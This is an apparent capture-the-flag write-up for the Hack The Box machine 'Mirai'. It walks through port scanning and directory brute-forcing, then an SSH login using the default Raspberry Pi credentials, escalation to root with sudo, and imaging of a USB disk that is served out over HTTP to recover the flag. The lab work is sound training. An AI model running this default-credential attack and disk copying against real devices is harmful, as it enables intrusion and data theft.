Mirai HTB
IP
10.10.10.48initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.48 | cut -d"/" -f1 | tr '\n' ','we have the following ports open
22,53,80,1255,32400,32469Lets run a more in-depth scan of the targets ports
sudo nmap -sCV -p22,53,80,1255,32400,32469 10.10.10.48 -oA nmap_resultsresults
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
1255/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
|_http-favicon: Plex
|_http-title: Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelwe have
Looks like we have two web servers running port
80, 32400DNS is open, maybe zone transfer
port
1255we have UPnP (Universal Plug and Play): A networking protocol that allows compliant devices to automatically set port forwarding rules for themselves, version 1.0.5.13
First lets perform a zone transfer DNS PORT 53
come back to this
Lets check out the webserver on port 80
we are bought to a plank page
we can confirm the lighttpd version
1.4.35
Lets run feroxbuster and see if we can find anything else
feroxbuster -u http://10.10.10.48 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txtWe find `http://10.10.10.48/admin/
Worth looking into when we finish enumerating
we find one directory `http://10.10.10.48/versions`, when we navigate to the directory we gain a .txt file with version numbers but nothing specified
,v3.1.4,v3.1,v2.10Not sure what this is
**HTTP PORT 32400**
when we navigate to http://10.10.10.48:32400 we can see the following
Lets see if we can perform some feroxbusting and find anything
feroxbuster -u http://10.10.10.48:32400 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs.txtlooks like there may be security inplace to prevent directory busting as we are getting 200s for everything
Lets create an account an inspect the request with burp
unable to create account, the application seems to be having password complications
So far our best bet is the pi-hole interface we found within the http://10.10.10.48
What is pi-hole: A network wide ad blocker designed to function as a DNS sinkhole, it primary purpose is to block any unwanted content
Most of the time these pi-hole interface's would be associated with a raspberry pie, meaning there could be a raspberry pie IoT device in the network
After a quick google search we find that the IoT device (Raspberry pi) often has SSH connection to the target server and the default credentials are
pi: raspberry
Lets see if we can SSH into the machine
ssh pi@10.10.10.48we now have access as pi on the target machine
When we check our sudo privileges we can see the following
sudo -l
we can simple sudo su and we are root
Now trying to find the root
when we cat out the root.txt we see the following
cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...Looking in the /media/usb we can see the following note
Lets see if we can create a image of the usb stick and enumerate it on our local machine
dd if=/dev/sdb bs=1M > /home/pi/disk.img
cd /home/pi
python3 -m http.server 9001Now we can download it onto our local machine
wget http://10.10.10.48:9001/disk.imgNow we can run strings and see if we can find anything interesting
strings disk.imgfrom here we can find the flag
Last updated